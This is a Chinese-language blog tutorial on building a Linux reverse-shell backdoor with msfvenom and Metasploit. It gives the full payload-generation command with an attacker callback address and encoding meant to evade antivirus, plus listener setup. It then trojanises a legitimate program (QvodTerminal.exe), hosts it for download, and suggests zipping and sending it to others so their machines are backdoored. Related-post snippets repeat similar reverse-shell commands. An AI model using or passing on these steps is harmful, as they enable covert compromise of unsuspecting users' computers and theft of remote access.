制作linux恶意软件获取shell加实战

已于 2022-04-20 19:05:04 修改
阅读量1.2k 收藏 4
点赞数 2
分类专栏: kali学习 文章标签: linux bash 运维
于 2022-02-25 21:28:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao_he0123/article/details/123140656
版权 
 

一.使用msf制作linux后门

二. 实战,给软件加后门

制作linux后门

1.使用msfvenom生成linux可执行文件

msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.124.3 LPORT=4444 -b '\x00' -i 10 -f elf -o /var/www/html/xueguo

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAanVzdCBhIGxlYWY=,size_20,color_FFFFFF,t_70,g_se,x_16

-a  x64                                      指定架构 (x86代表32为,x64代表64位)

--platform linux                         指定平台(linux)

-p payload                                指定payload

LHOST 192.169.124.3             目标主机

LPORT                                     指定连接kali的端口

-b ‘’                                     去除坏字符

-e x86/shikata_ga_nai              msf自带的编译器(-e:指定编译器也就是所谓的免杀)

-i 10                                           指定编码次数(增大免杀的概率)

-f elf                                           指定输出格式(linux是elf文件,windows是exe文件)

-o /var/www/html/123                指定文件名称和导出位置,指定到/var/www/html方便肉机上下载后门程序

2.kali开启监听

(1)开启msfconsole 

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAanVzdCBhIGxlYWY=,size_16,color_FFFFFF,t_70,g_se,x_16

 (小牛还挺可爱哈哈哈哈哈)

设定参数

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAanVzdCBhIGxlYWY=,size_18,color_FFFFFF,t_70,g_se,x_16

         handler   开启监听模式

         set payload linux/x86/meterpreter/reverse_tcp     指定payload

         set LPORT &&LHOST   指定端口和IP地址

(2)输入exploit开启监听

        之后linux系统运行软件后就可以进行监听

实战.给软件加后门

给正常软件加后门的思路:先查看主程序会调用哪些附加的小程序,然后把payload后门和把这些小程序绑定在一起(如果绑到主程序上有时会报错)

当运行QvodPlayer.exe这个主程序时同时会运行QvodTerminal.exe这个附加程序

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAanVzdCBhIGxlYWY=,size_20,color_FFFFFF,t_70,g_se,x_16

a.通过finalshell远程连接kali将QvodTerminal.exe传入

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAanVzdCBhIGxlYWY=,size_20,color_FFFFFF,t_70,g_se,x_16

 b.对QvodTerminal.exe注入后门程序

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAanVzdCBhIGxlYWY=,size_20,color_FFFFFF,t_70,g_se,x_16

 -x    表示要绑定木马的程序

c.利用绑定木马的QvodTerminal.exe代替原本的QvodTerminal.exe

在windows浏览器中访问http://192.168.124.3/QvodTerminal.exe下载该带有后门的程序并进行替换watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAanVzdCBhIGxlYWY=,size_20,color_FFFFFF,t_70,g_se,x_16

然后将其压缩成压缩包发送给他人他人点击使用后就可以在其电脑上留下后门 

just a leaf
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux x86_64 shellcode的编写
小立仔
07-06 1279
Linux x86_64 shellcode的编写
msf制作Linux恶意软件获取shell
Deeeelete的博客
02-26 729
1.生成linux可执行文件 msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.132.144 LPORT=4444 -b "\x00" -i 10 -f elf -o /var/www/html/clownclown 2.配置监听 3.拖进系统 4.赋予权限 5.运行 ...
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透1 — 制作 windows 和 linux 客户端恶意软件进行渗透
最新发布
天下著书立传者,皆为我师
05-29 983
通过制作含病毒和木马的恶意程序,利用msfvenom模块,完成靶机与msf相应的通信
Linux系统恶意代码】“亡命徒(Outlaw)僵尸网络” Kswapd0挖矿病毒的发现与清除
AGATHA_66的博客
01-11 1793
系统被SSH暴力破解后,攻击者会在系统目录下添.configrc5文件夹,文件结构内容如下,名为“a”的文件夹下存放开源门罗币挖矿程序kswapd0(xmrig)和启动脚本,名为“b”的文件夹下存放后门程序run和执行脚本。执行stop脚本,睡眠10秒,列出当前工作的路径并输出到dir.dir的文件中,执行kswapd0挖矿程序,把最后运行的后台进程的PID写入到一个.pid文件中。
渗透工具——kali中msf(后门生成模块msfvenom)
2301_78006725的博客
09-02 724
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!
利用MSF生成php,windows,Linux三类木马
2301_76786857的博客
03-19 1809
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
Linux shell 脚本攻略
12-24
本书《Linux Shell脚本攻略》(第2版)深入浅出地介绍了Shell脚本的编写技巧和实战应用,非常适合对Linux感兴趣的初学者学习。 **Shell脚本基础** 1. **Shell介绍**:ShellLinux的命令解释器,它提供了一个与...
Linux 应急响应流程及实战演练1
08-03
在面对Linux系统遭受黑客入侵、系统崩溃等安全事件时,企业必须快速响应以恢复业务正常运行,并查找攻击来源,还原事故过程,提供解决方案和预防措施。应急响应流程是确保网络信息安全的关键步骤。本文将围绕Linux...
Linux系统服务器防病毒实战.docx
09-26
Linux 系统服务器防病毒实战是指 Linux 操作系统服务器防止病毒和恶意程序的攻击和感染。随着 Linux 应用的日益广泛,有大量的网络服务器使用 Linux 操作系统。 Linux 操作系统一直被认为是 Windows 系统的劲敌,...
Linux下的渗透技术总结
06-08
这可以是恶意软件、隐藏的shell账号、隐蔽的网络服务等。后门应设计得难以被发现,以便在清理初始入侵后还能保持控制。 配合视频教程和txt文档,学习者可以深入理解每个步骤的具体操作和相关工具的使用。例如,"pan...
0x09.第九课 Metasploit生成linux木马并尝试提权.pdf
06-24
0x09.第九课 Metasploit生成linux木马并尝试提权.pdf
linux.zip
04-22
Linux操作系统详解及实战应用 Linux,作为开源操作系统中的翘楚,是全球众多企业和开发者热衷的平台。它基于Unix设计理念,具有高度可移植性、稳定性和安全性,被广泛应用于服务器、云计算、物联网设备以及个人电脑...
Kali使用Metapsloit渗透win10 生成 payload 反弹shell
weixin_45908624的博客
07-19 2364
windows payload 反弹shell
msf-Msfvenonm生成Linux后门木马实验
渗透、攻防、CTF、编程
10-12 9684
msf-meterpreter生成Linux后门木马实验 0x01 知识点 MSF工具的利用,msf生成Linux木马后门 0x02 实验环境: 攻击机kaili linux 2020 (ip:192.168.233.131) 攻击机kaili linux 2020 (ip:192.168.233.129) 0x03 实验过程 1、生成Linux后门 131机器打开kali msfconsole 输入 msfvenom -p linux/x64/meterpreter/reve..
msfvenom制作简易后门程序
wing_7的博客
10-05 597
设置错误端口8888监听不到,修改端口 4444 ,kali显示 session 连接接成功获取shell成功。使用exploit/mulit/handler模块并进行设置。基于LinuxShellcode。ubuntu中获取cve 执行。
快看这些wireshark 命令,必须得会!
mengmeng_921的博客
04-12 2159
5.2、搜索按条件过滤tcp的数据段payload(数字20是表示tcp头部有20个字节,数据部分从第21个字节开始tcp[20:])5.1、搜索按条件过滤udp的数据段payload(数字8是表示udp头部有8个字节,数据部分从第9个字节开始udp[8:])检测SMB头的smb标记,tcp的数据包含十六进制ff:53:4d:42,从tcp头部开始搜索此数据。Protocol :ether、ip、tcp、udp、http、ftp 指出协议。Direction:src、dst 指出传输方向 (源 、目的)
Metasploit 生成各种后门
热门推荐
CSDN
01-13 1万+
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境中的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.
生成payload木1马 攻击 linux
weixin_54472394的博客
05-07 651
需要 1.开启httpd 2.生成payload 木马 3.启动msfdb run 监听 4. 5. 6. 开始 1.1: 开启httpd nmap install 参数说明 ADD 添一个注册表项 -v 创建键值 -t 键值类型 -d 键值的值 // 0:关闭uac 1:开启uac -f 强制修改注册表项 收到 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值